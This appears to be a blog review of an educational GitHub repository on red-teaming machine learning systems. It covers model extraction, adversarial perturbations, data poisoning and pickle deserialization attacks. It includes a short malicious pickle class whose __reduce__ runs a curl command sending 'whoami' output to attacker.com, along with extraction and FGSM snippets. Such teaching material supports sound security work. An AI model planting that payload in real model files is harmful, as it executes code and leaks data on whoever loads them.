Back to Articles

Red Teaming Machine Learning: A Hands-On Guide to Breaking AI Systems

[ View on GitHub ]

Red Teaming Machine Learning: A Hands-On Guide to Breaking AI Systems

Hook

A single pixel change can make your production ML model misclassify a husky as a wolf. Even more concerning, that pickled model file you just downloaded might execute arbitrary code the moment you load it.

Context

Machine learning systems are increasingly deployed in critical applications—from content moderation to fraud detection to autonomous vehicles. Yet most security teams approach ML systems with traditional security testing methodologies that miss entire classes of vulnerabilities unique to statistical models. You can't SQL inject a neural network, but you can poison its training data. You can't XSS a random forest, but you can backdoor its serialized checkpoint file.

The wunderwuzzi23/mlattacks repository emerged from this gap between traditional security testing and ML-specific attack vectors. Created as an educational series, it demonstrates how adversaries can compromise ML systems at every stage of the pipeline: data collection, model training, serialization, deployment, and inference. Using a simple 'Husky AI' image classifier as the victim system, the project walks through real-world attack techniques that have been used against production ML systems, from adversarial examples that fool computer vision models to supply chain attacks that compromise the development environment itself.

Technical Insight

The repository's architecture centers on practical demonstrations rather than theoretical frameworks. Each attack vector gets its own Jupyter notebook that you can run locally, making the threat landscape tangible. The target system—a binary image classifier that distinguishes huskies from non-huskies—provides enough complexity to demonstrate real techniques while remaining accessible for learning.

One of the most immediately useful notebooks covers model extraction attacks, where an adversary queries your deployed model to recreate it. The technique is surprisingly straightforward: send carefully chosen inputs to the target model, collect the predictions, then train a surrogate model on this query-response dataset. Here's the core concept in code:

# Query the target model with crafted inputs
query_images = generate_strategic_queries(num_queries=1000)
predictions = []

for img in query_images:
    response = target_model.predict(img)
    predictions.append(response)

# Train a surrogate model on the stolen knowledge
surrogate_model = build_substitute_model()
surrogate_model.fit(query_images, predictions)

# Now use the surrogate to craft adversarial examples
adv_examples = generate_adversarial(surrogate_model, target_class)

The extraction attack demonstrates a fundamental vulnerability in ML-as-a-service deployments: your model's predictions leak information about its decision boundaries. Even with query limits, an attacker can strategically select inputs that maximize information gain, effectively reverse-engineering your proprietary model with just a few thousand queries.

But the most eye-opening section covers pickle file attacks, exploiting Python's serialization format that most ML practitioners use to save models. The pickle format allows arbitrary code execution during deserialization—a feature, not a bug, of Python's design. The repository demonstrates how an attacker can embed malicious code inside what appears to be a legitimate model checkpoint:

import pickle
import os

class MaliciousModel:
    def __reduce__(self):
        # This executes when unpickling
        cmd = 'curl attacker.com/exfiltrate?data=$(whoami)'
        return (os.system, (cmd,))

# Save the backdoored "model"
with open('husky_model.pkl', 'wb') as f:
    pickle.dump(MaliciousModel(), f)

When a victim loads this file with pickle.load(), the malicious code executes before they even use the model. This isn't a vulnerability in any specific library—it's inherent to how pickle works. The repository demonstrates modifying legitimate model files by injecting malicious payloads into the pickle stream, making the attack harder to detect.

The adversarial perturbation notebooks leverage the Adversarial Robustness Toolbox (ART) to demonstrate how imperceptibly small pixel changes can fool classifiers. Unlike random noise, adversarial perturbations are carefully calculated to maximize prediction error:

from art.attacks.evasion import FastGradientMethod
from art.estimators.classification import KerasClassifier

# Wrap the target model
classifier = KerasClassifier(model=husky_model)

# Create FGSM attack with small epsilon
attack = FastGradientMethod(estimator=classifier, eps=0.05)

# Generate adversarial examples
original_image = load_husky_image()
adversarial_image = attack.generate(x=original_image)

# The difference is invisible to humans but flips the prediction
print(f"Original: {classifier.predict(original_image)}")
print(f"Adversarial: {classifier.predict(adversarial_image)}")

The notebooks also cover data poisoning attacks, where attackers inject malicious samples into training data to influence model behavior. This is particularly relevant for models trained on user-generated content or public datasets. By poisoning just 3-5% of training data with strategically chosen examples, an attacker can create backdoors—specific patterns that trigger misclassification while maintaining normal accuracy on clean data.

What makes this repository valuable isn't novel attack research, but rather the practical synthesis of known techniques with working code. The notebooks include defensive countermeasures alongside attacks: input validation, adversarial training, model hardening, and secure deserialization alternatives. This offensive-defensive pairing helps security teams understand both the threat and potential mitigations.

Gotcha

The primary limitation is domain specificity. Nearly all demonstrations focus on computer vision and image classification. If you're working with NLP models, time series forecasting, or reinforcement learning systems, you'll need to extrapolate the techniques yourself. While the fundamental concepts transfer—adversarial examples exist across ML domains—the specific implementations don't.

The attack demonstrations also target a deliberately simplified binary classifier. Production ML systems add layers of complexity: ensemble models, preprocessing pipelines, output post-processing, and monitoring systems that may detect attack patterns. The repository doesn't address evasion techniques for bypassing ML-specific defenses like adversarial training or input sanitization. Some notebooks also depend on library versions from 2020-2022, and breaking changes in TensorFlow, PyTorch, or ART may require code updates. The educational value remains, but you might fight dependency conflicts before learning the actual attacks.

Verdict

Use if: you're implementing ML systems in production and need to threat model attack vectors beyond traditional security testing; you're a security researcher or red teamer expanding into ML-specific vulnerabilities; you're building security training for teams deploying ML models; or you need practical code examples to understand how adversarial attacks actually work rather than just reading academic papers. Skip if: you need production-ready security tooling rather than educational demonstrations; you're working exclusively with non-vision ML domains like NLP or tabular data; you want comprehensive defensive frameworks rather than attack-focused research; or you're looking for novel attack research rather than practical synthesis of known techniques. This repository excels as a learning resource and threat modeling reference, not as operational security infrastructure.

// ADD TO YOUR README
[![Featured on Starlog](https://starlog.is/api/badge/developer-tools/wunderwuzzi23-mlattacks.svg)](https://starlog.is/api/badge-click/developer-tools/wunderwuzzi23-mlattacks)